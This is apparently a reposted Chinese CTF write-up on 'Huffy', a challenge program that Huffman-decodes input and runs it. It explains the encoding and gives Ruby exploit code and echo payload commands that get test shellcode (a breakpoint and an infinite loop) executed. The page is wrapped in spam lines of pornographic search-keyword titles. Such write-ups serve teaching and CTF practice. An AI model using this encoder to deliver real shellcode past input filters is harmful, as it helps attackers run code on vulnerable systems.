精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Huffy:哈夫曼編碼的shellcode

作者:JackFree
安全 網站安全
初次見到“shellcode”的時候,感覺非常高大上,其實接觸久了之后你會發現它實際上只是一段代碼(也可以是填充數據),是一種用來發送到服務器利用特定漏洞的針對性代碼,一般可以利用它獲取一定的權限。

初次見到“shellcode”的時候,感覺非常高大上,其實接觸久了之后你會發現它實際上只是一段代碼(也可以是填充數據),是一種用來發送到服務器利用特定漏洞的針對性代碼,一般可以利用它獲取一定的權限。今天我們將共同學習一種新的shellcode編碼方式——Huffy,即基于哈夫曼編碼的shellcode,這種方式利用哈夫曼樹壓縮數據的特性來對shellcode進行數據壓縮,以達到“短小精悍”的目的。

Huffy:哈夫曼編碼的shellcode

哈夫曼樹

因為這種方法叫做Huffy,并且最近我剛剛解決了一個有關哈夫曼樹的問題,所以首先我想到的就是哈夫曼樹。

如果你還不知道什么是哈夫曼樹,那我就在這里簡單提一下。哈夫曼樹是一種相當簡單的數據結構,它可以用來進行數據壓縮。哈夫曼樹的建立是通過讀取輸入的內容,然后創建一棵樹,出現頻率***的字符靠近樹的頂部,而頻率***的字符靠近樹的底部。

為了壓縮數據,它會遍歷整個樹以生成編碼位(左邊的編碼為0,右邊的編碼為1)。一個字符越靠近樹的頂部,那么該字符編碼之后所用的位數越少,這也被稱為“前綴碼”,這是一種非常簡潔的屬性,該屬性意味著沒有編碼的位串會作為另一個位串的前綴(換句話說,當你閱讀二進制位流的時候,你就能立刻知道解碼該字符何時結束)。

例如下面的哈夫曼樹:

Huffy:哈夫曼編碼的shellcode

通過該哈夫曼樹,我們就能知道它來自一個包含9個字符的文本,其中有5個字符是字母“o”,3個字符是字母“d”,1個字符是字母“g”。

所以,當你用該樹壓縮數據時,你可以將單詞“dog”作如下處理:

d=00(左左)
o=1(右)
g=01(左右)

所以,“dog”將會編碼成位流“00101”。

如果你看到以位流“01100”表示的字符串,你就可以按照上面哈夫曼樹來解碼:左右(g)、右(o)、左左(d),所以解碼得到該字符串內容為“god”。

如果在一個字符串中所有字符的數目都相同,并且不同字符的種類數是2的整數冪(例如:“aabbccdd”中,不同字符的種類數為4,即2的平方),你就需要通過一個平衡的哈夫曼樹來表示。例如,字符串“aaabbbcccddd”的表示將會是如下形式的哈夫曼樹:

Huffy:哈夫曼編碼的shellcode

通過查找上圖中的哈夫曼樹可知,字符串“abcd”將會編碼成“00011011”。哈夫曼樹的這種特性非常重要。#p#

程序分析

當你運行程序時,它將提示你輸入,在你輸入相應內容之后,它將輸出一堆毫無意義的東西(盡管輸出使我們理解變得簡單多了)??梢钥聪逻@個例子:

$ echo 'this is a test string' | ./huffy
CWD: /home/ron/gits2015/huffy
Nibble  Frequency
------  ---------
0       0.113636
1       0.022727
2       0.113636
3       0.090909
4       0.090909
5       0.022727
6       0.181818
7       0.227273
8       0.022727
9       0.068182
a       0.022727
b       0.000000
c       0.000000
d       0.000000
e       0.022727
f       0.000000
Read 22 bytes
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.022727
Two lowest frequencies: 0.022727 and 0.022727
Two lowest frequencies: 0.022727 and 0.022727
Two lowest frequencies: 0.022727 and 0.045455
Two lowest frequencies: 0.045455 and 0.068182
Two lowest frequencies: 0.068182 and 0.090909
Two lowest frequencies: 0.090909 and 0.113636
Two lowest frequencies: 0.113636 and 0.113636
Two lowest frequencies: 0.159091 and 0.181818
Two lowest frequencies: 0.204545 and 0.227273
Two lowest frequencies: 0.227273 and 0.227273
Two lowest frequencies: 0.340909 and 0.431818
Two lowest frequencies: 0.454545 and 0.454545
Two lowest frequencies: 0.772727 and 0.909091
Breaking!
0 --0--> 0x9863348 --1--> 0x9863390 --1--> 0x98633c0 --1--> 0x98633d8
1 --0--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
2 --1--> 0x9863348 --1--> 0x9863390 --1--> 0x98633c0 --1--> 0x98633d8
3 --1--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
4 --0--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8
5 --0--> 0x98632d0 --0--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8
6 --1--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
7 --1--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8
8 --0--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
9 --1--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8
a --1--> 0x98632d0 --0--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8
b --0--> 0x9863258 --0--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
c --1--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
d --1--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
e --1--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
f --1--> 0x9863258 --0--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8
Encoding input...
ASCII Encoded: 011010000100000001010110110001111111100010101101100011111111000100001011111110011010000101010001100010110100111111100110001011010001111110010101100100001110010111110010101
Binary Encoded:
h@V????Q?O?-????
Executing encoded input...
Segmentation fault

可能理解起來需要花一點時間,但是一旦你明白了,你會發現輸出的內容很直截了當。

***部分分析了每個半字節(半字節代表一個十六進制字符或字節的一半)出現的頻率。這部分結果告訴我們程序通過半字節的形式對數據進行了壓縮,然后給出了輸入內容中字符出現頻率的分析,***顯示了16個可能半字節的編碼結果。

編碼之后,會將這些位轉換成一個很長的二進制碼流,然后運行它們。

流程總結:首先輸入一些數據,然后以半字節為單位用哈夫曼編碼進行壓縮,***將其轉換成可執行的代碼,此時我們就得到了利用哈夫曼算法壓縮過的shellcode。

為了簡單起見,我還是用一些shell代碼來清理輸出的內容,以方便我更好地分析到底發生了什么:

$ echo 'this is a test string' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//'

得到如下結果:

[...]
0 0111
1 010000
2 1111
3 1000
4 0010
5 001010
6 100
7 110
8 00000
9 11010
a 101010
b 0000110000
c 10110000
d 100110000
e 1110000
f 1000110000
Encoding input...
ASCII Encoded: 011010000100000001010110110001111111100010101101100011111111000100001011111110011010000101010001100010110100111111100110001011010001111110010101100100001110010111110010101

如果你嘗試輸入“AAAA”,你將得到如下結果:

$ echo 'AAAA' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//'[...]
0 0101
1 0
2 0000000000001101
3 101101
4 11
5 1001101
6 10001101
7 100001101
8 1000001101
9 10000001101
a 11101
b 100000001101
c 1000000001101
d 10000000001101
e 100000000001101
f 1000000000001101
Encoding input...
ASCII Encoded: 110110110110101010111
Binary Encoded:

如果你嘗試輸入“AAAA”,你將得到如下結果:

你可能知道“AAAA”=“41414141”(ASCII碼表示),所以'4'和'1'就成了最常用的半字節,而由上面圖中也能證實,即'4'被編碼成'11','1'被編碼成'0'。我們希望以一個換行符'\x0a'結束,所以'0'和'a'也應該進行編碼。

如果我們將這些字符分開,可以得到如下內容:

ASCII Encoded: 11 0 11 0 11 0 11 0 1010 10111

需要注意的是,圖中編碼后的結果都被逆序了,雖然'11'和'0'其實并不受逆序的影響,但是'1010'='0101'='0','10111'='11101'='a'。說實話,剛開始我并沒有注意到逆序問題的存在,但我以一個新的方式解決了這個問題。

還記得前面說的嗎?如果有一個含有2的冪次方個節點的平衡樹,所有的字符都將被編碼成相同的位數。事實證明,結果有16個不同的半字節,所以如果你輸入的字符串中有偶數個半字節,那么它們都將被編碼成4位:

$ echo -ne '\x01\x23\x45\x67\x89\xab\xcd\xef' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//'0 0000
1 0001
2 0011
3 0010
4 0110
5 0111
6 0101
7 0100
8 1100
9 1101
a 1111
b 1110
c 1010
d 1011
e 1001
f 1000

它們不僅會被編碼成4位,而且每一種可能的4位值都被列出來了。#p#

方法使用

其實,這種方法使用起來非常簡單,需要做的僅僅是簡單的查表:

1、首先算出半字節對應的編碼后的二進制位;

2、將這些半字節作為shellcode寫出來;

3、填充shellcode,直到每個半字節都有相同的數量。

這已經相當的直觀了,你可以參考我的全部利用代碼,或者利用下面的片段根據實際情況進行拼接。

首先,創建一個表(下面是我手工創建的):

@@table = {  "0000" => 0x0, "0001" => 0x1, "0011" => 0x2, "0010" => 0x3,  "0110" => 0x4, "0111" => 0x5, "0101" => 0x6, "0100" => 0x7,  "1100" => 0x8, "1101" => 0x9, "1111" => 0xa, "1110" => 0xb,  "1010" => 0xc, "1011" => 0xd, "1001" => 0xe, "1000" => 0xf,
}

 

然后,將shellcode進行編碼:

def encode_nibble(b)
  binary = b.to_s(2).rjust(4, '0')
  puts("Looking up %s... => %x" % [binary, @@table[binary]])  return @@table[binary]end@@hist = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ]#shellcode = "\xeb\xfe"#shellcode = "\xcd\x03"shellcode = "hello world, this is my shellcode!"shellcode.each_byte do |b|
  n1 = b >> 4
  n2 = b & 0x0f
  puts("n1 = %x" % n1)
  puts("n2 = %x" % n2)  @@hist[n1] += 1
  @@hist[n2] += 1
  out += ((encode_nibble(n1) << 4) | (encode_nibble(n2) & 0x0F)).chrend

需要注意一下,我保存了一個直方圖,利用它可以使***一步的實現更加簡單,然后根據需要填充字符串:

def get_padding()
  result = ""
  max = @@hist.max
  needed_nibbles = []  0.upto(@@hist.length - 1) do |i|
    needed_nibbles << [i] * (max - @@hist[i])
    needed_nibbles.flatten!  end
  if((needed_nibbles.length % 2) != 0)
    puts("We need an odd number of nibbles! Add some NOPs or something :(")    exit
  end
  0.step(needed_nibbles.length - 1, 2) do |i|
    n1 = needed_nibbles[i]
    n2 = needed_nibbles[i+1]
    result += ((encode_nibble(n1) << 4) | (encode_nibble(n2) & 0x0f)).chr  end
  return resultend

現在輸出中應該包含一串對應shellcode的半字節,應該是這樣的。

***,我們將其輸出:

def output(str)
  print "echo -ne '"
  str.bytes.each do |b|
    print("\\x%02x" % b)  end
  puts("' > in; ./huffy < in")end

#p#

修復bug

你注意到剛剛我哪里做錯了嗎?其實,剛剛我犯了個大錯誤,當我試圖編碼“hello world, this is my shellcode!”時,我得到如下結果:

echo -ne '\x4f\x46\x48\x48\x4a\x30\x55\x4a\x53\x48\x47\x38\x30\x57\x4f\x4e\x52\x30\x4e\x52\x30\x49\x5e\x30\x52\x4f\x46\x48\x48\x42\x4a\x47\x46\x31\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x33\x33\x33\x33\x33\x33\x22\x22\x22\x22\x22\x22\x22\x22\x77\x77\x77\x77\x77\x77\x77\x77\x76\x66\x66\x66\x66\x66\x66\x66\x66\x55\x55\x55\x55\x55\x55\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xee\xee\xee\xee\xee\xee\xee\xee\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\x88\x88\x88\x88\x88\x88\x88\x99\x99\x99\x99\x99\x99\x99\x99\x99\x9b\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xba\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' > in; ./huffy < in

上面結果轉換為可視字符后為:

ajcco@?o?cbC@?ai?@i?@k?@?ajcclobj?????????DDDDDD????????""""""""*??????????????????????UUUUUUUUUU??????????3333333??????????wwwwwwwww????????

發生了什么事?這不是我之前輸入的字符串啊。

但是,觀察到字符串以“ajcco”開頭,而我之前輸入的字符串是以“hello”開頭。然后,半字節和字符的對應表就得到啦,如下所示:

0 0000
1 0001
2 0011
3 0010
4 0110
5 0111
6 0101
7 0100
8 1100
9 1101
a 1111
b 1110
c 1010
d 1011
e 1001
f 1000

為了解決這個問題,我試了下面的shellcode:

"\x01\x23\x45\x67\x89\xab\xcd\xef"

然后將其編碼,得到如下結果:

0000100001001100001010100110111000011001010111010011101101111111

以十六進制表示為:

"\x08\x4c\x3a\x6e\x19\x5d\x3b\x7f"

或者,以半字節形式表示為:

0000
1000
0100
1100
0010
1010
0110
1110
0001
1001
0101
1101
0011
1011
0111
1111

如果多花點精力觀察的話,我應該早就發現這個很明顯的問題啦:逆序問題。

因為之前我急于完成它,我沒有注意到每個半字節的各個位都被逆序了(1000而不是0001,0100而不是0010等等)。

雖然之前我沒有注意這個問題,但是我發現所有的結果都是完全錯誤的,所以我做了以下內容:

hack_table = {
  0x02 => 0x08, 0x0d => 0x09, 0x00 => 0x00, 0x08 => 0x02,
  0x0f => 0x01, 0x07 => 0x03, 0x03 => 0x07, 0x0c => 0x06,
  0x04 => 0x04, 0x0b => 0x05, 0x01 => 0x0f, 0x0e => 0x0e,
  0x06 => 0x0c, 0x09 => 0x0d, 0x05 => 0x0b, 0x0a => 0x0a
}
hack_out = ""
out.bytes.each do |b|
  n1 = hack_table[b >> 4]
  n2 = hack_table[b & 0x0f]
  hack_out += ((n1 << 4) | (n2 & 0x000f)).chrendoutput(hack_out)

然后用原來的測試shellcode重新運行了該程序:

$ ruby ./sploit.rb
echo -ne '\x41\x4c\x42\x42\x4a\x70\xbb\x4a\xb7\x42\x43\x72\x70\xb3\x41\x4e\xb8\x70\x4e\xb8\x70\x4d\xbe\x70\xb8\x41\x4c\x42\x42\x48\x4a\x43\x4c\x7f\x00\x00\x00\x00\x00\x00\x00\x0f\xff\xff\xff\xff\xff\xff\xff\xff\xff\x77\x77\x77\x77\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x33\x33\x33\x33\x33\x33\x33\x33\x3c\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xbb\xbb\xbb\xbb\xbb\xbb\x11\x11\x11\x11\x11\x11\x11\x11\x1e\xee\xee\xee\xee\xee\xee\xee\xee\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x22\x22\x22\x22\x22\x22\x22\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xd5\x55\x55\x55\x55\x55\x55\x55\x55\x55\x5a\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' > in; ./huffy < in

運行上面我所得到的編碼之后的代碼,結果為:

$ echo -ne '\x41\x4c\x42\x42\x4a\x70\xbb\x4a\xb7\x42\x43\x72\x70\xb3\x41\x4e\xb8\x70\x4e\xb8\x70\x4d\xbe\x70\xb8\x41\x4c\x42\x42\x48\x4a\x43\x4c\x7f\x00\x00\x00\x00\x00\x00\x00\x0f\xff\xff\xff\xff\xff\xff\xff\xff\xff\x77\x77\x77\x77\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x33\x33\x33\x33\x33\x33\x33\x33\x3c\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xbb\xbb\xbb\xbb\xbb\xbb\x11\x11\x11\x11\x11\x11\x11\x11\x1e\xee\xee\xee\xee\xee\xee\xee\xee\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x22\x22\x22\x22\x22\x22\x22\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xd5\x55\x55\x55\x55\x55\x55\x55\x55\x55\x5a\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' > in; ./huffy < in

二進制編碼結果為:

hello world, this is my shellcode!""""""33333333DDDDDDDDEUUUUUUUUwwwwww????????????????????????????????????????????????????????????????????????
Executing encoded input...
Segmentation fault

現在看起來正常了,通過修改那個錯誤已經可以正確地解碼了。下面再試一下我比較喜歡的兩個測試字符串“\xcd\x03”(調試斷點,也可使用“\ xcc”)和“\ xeb \ xfe”(無限循環):

$ ruby ./sploit.rb
echo -ne '\x2d\x08\xf7\x3c\x4b\x1e\x69\x5a' > in; ./huffy < in
$ echo -ne '\x2d\x08\xf7\x3c\x4b\x1e\x69\x5a' > in; ./huffy < in
Binary Encoded:
?Eg???
Executing encoded input...
Trace/breakpoint trap
$ ruby ./sploit.rb
echo -ne '\x59\xa5\x00\xff\x77\x88\x33\xcc\x44\xbb\x11\xee\x66\x92\x2d\xda' > in; ./huffy < in
$ echo -ne '\x59\xa5\x00\xff\x77\x88\x33\xcc\x44\xbb\x11\xee\x66\x92\x2d\xda' > in; ./huffy < in
Binary Encoded:
??"3DUfw??????
Executing encoded input...
[...infinite loop...]

總結

總的來說,利用哈夫曼編碼處理shellcode是一種相當直觀的方法,通過以半字節為單位壓縮你輸入的數據,然后就能得到編碼之后的shellcode,經過驗證,經過這種方法壓縮之后的shellcode能夠正常運行。

***,在使用該方法的時候,可以將目標shellcode填充得到1024個半字節,接著進行哈夫曼編碼并進行利用。

責任編輯:藍雨淚 來源: FreeBuf
shellcode哈夫曼編碼Huffy
相關推薦

2021-06-16 17:36:39

節點編碼哈夫曼樹

2011-05-20 14:03:31

哈夫曼

2011-04-28 10:07:24

哈弗曼編碼

2023-06-27 10:41:01

數學論文

2021-03-24 10:41:04

Java數據結構算法

2011-12-15 10:38:06

OPEN聯盟以太網

2016-01-08 19:10:00

京東智能

2012-11-27 17:41:16

2016-01-14 11:50:16

Shellcode分析PyAnaShellcode分析

2022-05-09 11:46:49

亞馬遜云科技汽車哈曼

2015-06-30 13:06:00

ShellterShellcode注入

2015-11-24 15:22:53

HTTP2 WEB 內網穿透

2020-09-28 10:47:41

Shellcode技術

2011-07-13 16:56:10

2017-01-16 09:26:07

2021-11-29 05:32:47

內存規避安全工具惡意軟件

2020-10-16 10:30:28

黑客

2022-05-06 18:55:29

Java技巧Shellcode

2013-12-10 10:53:47

shellcode

2015-10-23 17:12:22

JBL
點贊
收藏

51CTO技術棧公眾號

亚洲成人中文字幕在线| 欧美性x x x| 写真福利精品福利在线观看| 中文字幕国产一区| 成人中文字幕在线观看| 精品无码久久久久久久| 国产不卡av一区二区| 884aa四虎影成人精品一区| 黄色特一级视频| 欧美成熟毛茸茸| 激情综合色播五月| 5252色成人免费视频| 国产91在线播放九色| 成人免费在线电影网| 欧美伊人久久大香线蕉综合69| 一级黄色片播放| 欧美套图亚洲一区| 国产不卡在线播放| 国产精品自拍网| 亚洲黄色一区二区| 亚洲高清资源在线观看| 亚洲欧美国产一本综合首页| 国产sm在线观看| 成人免费毛片嘿嘿连载视频…| 一区二区三区资源| 视频一区二区综合| 五月婷婷在线播放| 国产麻豆成人传媒免费观看| 国产精品电影网站| 特黄视频免费看| 国产精品v日韩精品v欧美精品网站| 亚洲欧美国产日韩中文字幕| 人妻换人妻a片爽麻豆| 亚洲精品伦理| 在线免费精品视频| 成人午夜精品久久久久久久蜜臀| 免费在线你懂的| 久久精品日产第一区二区三区高清版 | 亚洲成av人影院| 欧美亚洲视频一区| sese一区| 国产免费久久精品| 欧美激情第一页在线观看| 日本高清视频在线| 国产99精品国产| 亚洲永久免费观看| 97人妻一区二区精品免费视频| 日韩精品亚洲一区二区三区免费| 91国产精品91| 日韩久久久久久久久| 欧美日韩一区自拍| 欧美人与性动交| 欧美成人免费看| 2023国产精品久久久精品双| 色悠悠久久88| 天天做夜夜爱爱爱| 91精品啪在线观看国产18| 久久精品最新地址| 黄色a级片在线观看| 久久亚洲国产| 日韩亚洲国产中文字幕| 懂色av蜜臀av粉嫩av永久| 日本在线电影一区二区三区| 永久免费毛片在线播放不卡| 性の欲びの女javhd| 欧美手机视频| www.亚洲男人天堂| 免费精品在线视频| 一区二区不卡| 欧美福利视频在线| www.国产成人| 肉肉av福利一精品导航| 国产精品成久久久久三级| 无码人妻丰满熟妇精品区| 久久精品综合| 国产日本欧美一区二区三区在线| 亚洲视频在线观看一区二区| 精品亚洲免费视频| 91嫩草免费看| 日本xxxxxwwwww| 91小视频免费观看| 欧美一区二区综合| 九义人在线观看完整免费版电视剧| 亚洲视频综合在线| 国产精品久久久久9999爆乳| 免费h在线看| 在线观看一区二区视频| 中文字幕在线视频精品| 日韩在线网址| 精品网站999www| 欧美另类69xxxx| 欧美久久九九| 欧美最猛性xxxxx免费| 国产亚洲久一区二区| 国产一区二区0| 九九九热999| 亚洲s色大片| 亚洲在线免费播放| 亚洲熟妇av一区二区三区| 日韩一级视频| 日韩成人在线电影网| 手机看片国产日韩| 亚洲性色视频| 国产深夜精品福利| 六月丁香色婷婷| 国产精品女同一区二区三区| 国产91沈先生在线播放| 色综合天天色| 亚洲黄在线观看| 亚洲人与黑人屁股眼交| 国产免费成人| 亚洲最大av网| 成人在线免费公开观看视频| 婷婷激情综合网| 一道本在线免费视频| 欧美亚洲国产日韩| 久久艳片www.17c.com| 国产午夜精品久久久久| 成人综合婷婷国产精品久久| 色噜噜狠狠一区二区三区| 久草在线视频福利| 欧美狂野另类xxxxoooo| 亚洲第一香蕉网| 国产一区美女| 91精品视频在线| 国产福利在线看| 婷婷开心久久网| 亚洲国产欧美91| 成人在线免费观看网站| 欧美亚洲视频一区二区| 亚洲av无码乱码在线观看性色| 国产精品女主播在线观看| 日韩免费毛片视频| 免费福利视频一区| 久久久久久久成人| 国产精品伦一区二区三区| 国产日韩精品视频一区| 成年人网站免费视频| 秋霞一区二区| 大量国产精品视频| 国产精品老熟女视频一区二区| 国产精品天干天干在观线| 日本三级免费网站| 网友自拍区视频精品| 久久男人av资源网站| 精品区在线观看| 亚洲欧美一区二区三区久本道91 | 亚洲女同av| 亚洲精品xxx| 欧美激情一区二区视频| 国产自产视频一区二区三区| 在线免费一区| 在线视频成人| 久热精品视频在线| 国产视频www| 一区二区三区精品| 色哟哟免费视频| 狠狠久久婷婷| 国产精品日韩一区二区免费视频| 国产丝袜在线播放| 亚洲第一网站男人都懂| 日韩免费av片| 91在线码无精品| 免费在线观看日韩视频| 亚洲素人在线| 国产精品美女久久久久久免费| 国产精品四虎| 欧美精品日韩精品| 真实国产乱子伦对白在线| 国产福利不卡视频| 中文字幕无码精品亚洲资源网久久| 国产另类在线| 欧美一级电影在线| 超碰免费在线| 欧美一卡二卡在线| 亚洲一区欧美在线| 亚洲国产高清aⅴ视频| 国产精品久久久久久9999| 欧美日韩日本国产亚洲在线| 风间由美久久久| 亚洲精品福利电影| 神马久久桃色视频| 精品久久久无码中文字幕| 欧美日韩激情网| 国产又黄又粗视频| 国产成人午夜精品影院观看视频| 霍思燕三级露全乳照| jizzjizz欧美69巨大| 91久久久久久久一区二区| 丁香影院在线| 国产亚洲精品激情久久| 国产亲伦免费视频播放| 欧美日韩国产黄| 一本色道久久88| 国产ts人妖一区二区| 激情六月丁香婷婷| 99久久婷婷| 久久婷婷人人澡人人喊人人爽| 91看片一区| 欧美大片在线看| 国产一区二区三区福利| 日韩一区二区在线免费观看| 免费视频网站在线观看入口| 亚洲美腿欧美偷拍| 久久午夜福利电影| 成人丝袜高跟foot| 在线观看日本一区二区| 999亚洲国产精| 亚洲在线色站| 亚洲精品中文字幕99999| 91在线直播亚洲| jizzjizz少妇亚洲水多| 欧美风情在线观看| 午夜国产福利在线| 亚洲另类xxxx| 风流老熟女一区二区三区| 欧美性一区二区| 欧美日韩综合在线观看| 亚洲黄色免费网站| 公肉吊粗大爽色翁浪妇视频| 成人av在线影院| 日韩av加勒比| 美女视频网站久久| 亚洲欧洲日产国码无码久久99| 午夜性色一区二区三区免费视频| 日韩三级电影| 自拍自偷一区二区三区| av成人综合网| 综合久久伊人| 国产情人节一区| 亚洲伦乱视频| 国产成人午夜视频网址| av在线播放资源| 欧美黑人视频一区| 最新国产露脸在线观看| 日韩有码视频在线| 男人在线资源站| 色偷偷噜噜噜亚洲男人的天堂 | 在线电影av不卡网址| 日本视频在线观看一区二区三区| 欧美va亚洲va| 成人毛片在线免费观看| 日韩视频永久免费| 国产男男gay体育生网站| 欧美日韩成人激情| 在线观看黄色国产| 欧美主播一区二区三区美女| 99久久精品国产亚洲| 福利一区福利二区微拍刺激| 久久精品女人毛片国产| 亚洲一区影音先锋| 久久久久亚洲av成人片| 一区二区三区久久| 国产精品第二十页| 亚洲午夜久久久久久久久电影网 | 在线一区二区观看| 最近中文字幕在线观看视频| 欧美少妇性性性| 中文字幕丰满人伦在线| 欧美日韩精品三区| 精品国产无码一区二区三区| 欧美一区二区三区视频免费 | 精品国产第一福利网站| 国产成人精品久久久| 视频精品导航| 亚洲iv一区二区三区| 91成人精品在线| 狠狠色综合色区| 蜜臀91精品国产高清在线观看| 欧美污视频久久久| 91影院成人| 97在线免费视频观看| 亚洲精品偷拍| 超碰av在线免费观看| 麻豆视频一区二区| 中文字幕一二三| 99视频在线观看一区三区| 国产精品扒开腿做爽爽| 国产精品久久久久久久久晋中 | 国产精品欧美亚洲777777| www.久久| 电影午夜精品一区二区三区| 性欧美lx╳lx╳| 亚洲欧美日韩精品综合在线观看| 五月精品视频| 国产免费毛卡片| 精品一区二区三区欧美| 又黄又爽的网站| 中文字幕免费不卡在线| www.99re7| 色八戒一区二区三区| 国产一区二区小视频| 亚洲精品大尺度| 91社区在线观看| 久久人91精品久久久久久不卡| 外国成人直播| caoporn国产精品免费公开| 久久99高清| 国产91视频一区| 日韩专区中文字幕一区二区| 黄页网站在线看| 国产日韩欧美电影| 国产亚洲欧美精品久久久久久| 在线亚洲免费视频| 全国男人的天堂网| 久久精品中文字幕| 综合在线影院| 国产女人水真多18毛片18精品| 日韩毛片视频| 亚洲精品无码久久久久久| 国产乱淫av一区二区三区| 精品成人av一区二区三区| 亚洲一区二区在线免费看| 伊人免费在线观看| 日韩高清a**址| 性欧美猛交videos| 国产男女猛烈无遮挡91| 亚洲免费观看高清完整版在线观| 欧美乱做爰xxxⅹ久久久| 久久99精品久久久久久国产越南 | 99国产精品一区二区三区 | 91久久久亚洲精品| 精品免费av| koreanbj精品视频一区| 国产高清成人在线| 二区三区四区视频| 欧美主播一区二区三区美女| 日本免费一区二区三区最新| 97色在线视频| 91亚洲精品视频在线观看| 国产精品99久久久久久大便| 日本午夜一区二区| 国产精品久久久久无码av色戒| 亚洲成人综合在线| 亚洲AV无码精品色毛片浪潮| 久久精品国产视频| 久久久久久久性潮| 亚洲mv在线看| 三级亚洲高清视频| 久久人妻一区二区| 亚洲国产精品精华液网站| wwwav在线播放| 欧美成人黑人xx视频免费观看| 巨大黑人极品videos精品| 亚洲视频sss| 蜜臀av亚洲一区中文字幕| 国产1区2区在线观看| 欧美亚洲国产怡红院影院| 国产人成在线观看| 国产精品久久久久久搜索| 精品国产不卡| 国产野外作爱视频播放| 国产精品国产三级国产a| 伊人免费在线观看| 久久九九全国免费精品观看| 综合久草视频| 毛片av在线播放| 成人一区在线看| 日韩精品在线不卡| 亚洲欧美日韩成人| 91天天综合| 一区二区三区的久久的视频| 国内精品第一页| 免费在线观看国产精品| 欧美成人福利视频| 美女高潮在线观看| 日韩国产欧美一区| 久久精品久久精品| 日韩一区二区三区四区在线| 精品免费国产一区二区三区四区| gratisvideos另类灌满| 久久精品人人做人人爽电影| 麻豆精品网站| 又嫩又硬又黄又爽的视频| 91精品国产综合久久久久久漫画| 性国产高清在线观看| 国模一区二区三区私拍视频| 毛片一区二区| 成人做爰视频网站| 亚洲娇小xxxx欧美娇小| 免费电影日韩网站| 一区二区日本伦理| 成人av影院在线| 国产美女www爽爽爽| 久久综合伊人77777| 青青一区二区| 在线观看免费不卡av| 亚洲妇女屁股眼交7| 国产三级电影在线| 成人黄色片视频网站| 日韩精品91亚洲二区在线观看| 日韩一区二区三区四区在线| 日韩精品有码在线观看| 伊人久久大香线蕉综合影院首页| 免费高清一区二区三区| 国产日韩精品一区| 成人午夜视频一区二区播放| 欧美专区第一页| 欧美久久99| 精品亚洲aⅴ无码一区二区三区|